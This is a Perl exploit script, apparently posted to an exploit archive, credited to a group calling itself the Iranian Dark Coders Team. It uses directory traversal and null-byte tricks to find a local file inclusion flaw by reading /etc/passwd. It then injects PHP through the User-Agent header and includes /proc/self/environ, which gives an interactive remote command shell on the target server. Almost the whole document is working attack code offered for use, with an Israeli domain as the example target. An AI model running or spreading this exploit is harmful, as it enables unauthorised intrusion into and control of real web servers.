This perl script leverages /proc/self/environ to attempt getting code execution out of a local file inclusion vulnerability.
bd77eecfb380be0b2302b89fd25fafe9ee987dadd671f7e40d057f74b0ce0ade
LFI TO RCE....
LFI Expl0iter (ver : beta)
http://mrsco.persiangig.com/perl/LFI%20ExplOiter.pl
#Iranian Dark Coders Team
#WwW.IDC-TeaM.NeT
#Coded BY M.R.S.CO
#We Are : M.R.S.CO , N3O , G3n3Rall , Nafsh , HijaX
#Friends : b3hz4d , IrIsT , Mr.Xpr , BlacK.King
#LFI ExplOiter
#ver : beta
#author : Iranian_Dark_Coders_Team
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print q (
------------------------------
| Iranian Dark Coders Team |
------------------------------
| WwW.IDC-TeaM.NeT |
------------------------------
| Coded BY M.R.S.CO |
------------------------------
);
use LWP::UserAgent;
use LWP::Simple;
$ua = LWP::UserAgent ->new;
$ua->timeout(30);
print "\n\t Enter Target [Example:http://site.il/idc.php?id=]";
print "\n\n \t Enter Target : ";
$Target=<STDIN>;
chomp($Target);
$tf=1;
print "\n\n\t\tprocessing ...\n";
$t=0;
while($tf==1)
{
$t=$t+1;
if ($t==25){print "Passwd Not Found!!"; exit();}
$dot=$dot . "../";
$source=get $Target . $dot . "etc/passwd";
$source2=get $Target .$dot . "etc/passwd%00";
if (($source =~ m/:root:/i || $source =~ m/:x:/i || $source =~ m/:0:/i))
{
$u="";
$tf=2;
}
if (($source2 =~ m/:root:/i || $source2 =~ m/:x:/i || $source2 =~ m/:0:/i))
{
$u="%00";
$tf=2;
}
}
$ua->agent('<?php echo "IDC"; ?>');
$response=$ua->get($Target . $dot . "proc/self/environ" . $u);
if ($response->decoded_content =~ "IDC")
{
while($cmd=="exit")
{
print "\n\nEnter Your Command : ";
$cmd=<STDIN>;
chomp($cmd);
$ua->agent('<?php echo "\n\n\nidc-team"; system("' . $cmd . '"); echo "mrsco\n\n\n"; ?>');
$response=$ua->get($Target . $dot . "proc/self/environ" . $u);
$between=substr($response->decoded_content, index($response->decoded_content, 'idc-team')+8, index($response->decoded_content, 'mrsco') - index($response->decoded_content, 'idc-team')-8);
print "\n". $between;
}}else{ print "\n\t\tDont Injectable";}